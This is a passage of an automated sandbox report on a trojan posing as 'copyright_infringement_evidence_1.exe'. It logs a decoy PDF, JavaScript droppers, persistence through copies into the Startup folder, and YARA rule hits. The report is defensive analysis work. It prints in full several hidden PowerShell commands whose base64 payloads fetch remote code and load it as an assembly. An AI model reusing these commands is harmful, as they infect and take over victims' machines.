QAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18DA4A0 CertEnumCertificatesInStore,NtCreateFile,0_2_00007FF7A18DA4A0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18745F0 NtCancelIoFileEx,RtlNtStatusToDosError,0_2_00007FF7A18745F0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A178ABFF0_2_00007FF7A178ABFF
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A1781E230_2_00007FF7A1781E23
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17A8FE70_2_00007FF7A17A8FE7
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18C8AB00_2_00007FF7A18C8AB0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18D32A00_2_00007FF7A18D32A0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A185C2F00_2_00007FF7A185C2F0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17D83100_2_00007FF7A17D8310
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18CFB000_2_00007FF7A18CFB00
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17FC3100_2_00007FF7A17FC310
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17D72300_2_00007FF7A17D7230
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A1816A400_2_00007FF7A1816A40
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18C42600_2_00007FF7A18C4260
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17C81F00_2_00007FF7A17C81F0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18C2A000_2_00007FF7A18C2A00
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17C8CA00_2_00007FF7A17C8CA0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18234B00_2_00007FF7A18234B0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18D14A00_2_00007FF7A18D14A0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A1784CC50_2_00007FF7A1784CC5
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18CECC00_2_00007FF7A18CECC0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A1815CF00_2_00007FF7A1815CF0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17CB4400_2_00007FF7A17CB440
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18CA4400_2_00007FF7A18CA440
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17933B20_2_00007FF7A17933B2
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18323700_2_00007FF7A1832370
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A1789EA00_2_00007FF7A1789EA0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18C96D00_2_00007FF7A18C96D0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A182E6500_2_00007FF7A182E650
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18166900_2_00007FF7A1816690
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A1868E900_2_00007FF7A1868E90
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18CDE800_2_00007FF7A18CDE80
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17C7E100_2_00007FF7A17C7E10
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18CE5700_2_00007FF7A18CE570
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18BF5800_2_00007FF7A18BF580
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17C88E00_2_00007FF7A17C88E0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18D88300_2_00007FF7A18D8830
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18A60600_2_00007FF7A18A6060
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A17C80700_2_00007FF7A17C8070
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18CB0600_2_00007FF7A18CB060
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18CBFA00_2_00007FF7A18CBFA0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A181AF700_2_00007FF7A181AF70
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FF83B9B329229_2_00007FF83B9B3292
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FF83B99329230_2_00007FF83B993292
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 43_2_00007FF83B99329243_2_00007FF83B993292
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF83B9B329245_2_00007FF83B9B3292
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FF83B98329253_2_00007FF83B983292
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: String function: 00007FF7A18D8F30 appears 121 times
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: String function: 00007FF7A18D9030 appears 104 times
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3049
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2817
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3049
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2817
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2817
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3049Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2817
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3049
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2817
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2817
            Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 8824, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@99/86@0/6
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeFile created: C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdfJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8260:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8720:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9072:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-07 20-15-05-350.logJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" "
            Source: copyright_infringement_evidence_1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: copyright_infringement_evidence_1.exeVirustotal: Detection: 15%
            Source: unknownProcess created: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe "C:\Users\user\Desktop\copyright_infringement_evidence_1.exe"
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.js
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.js
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAA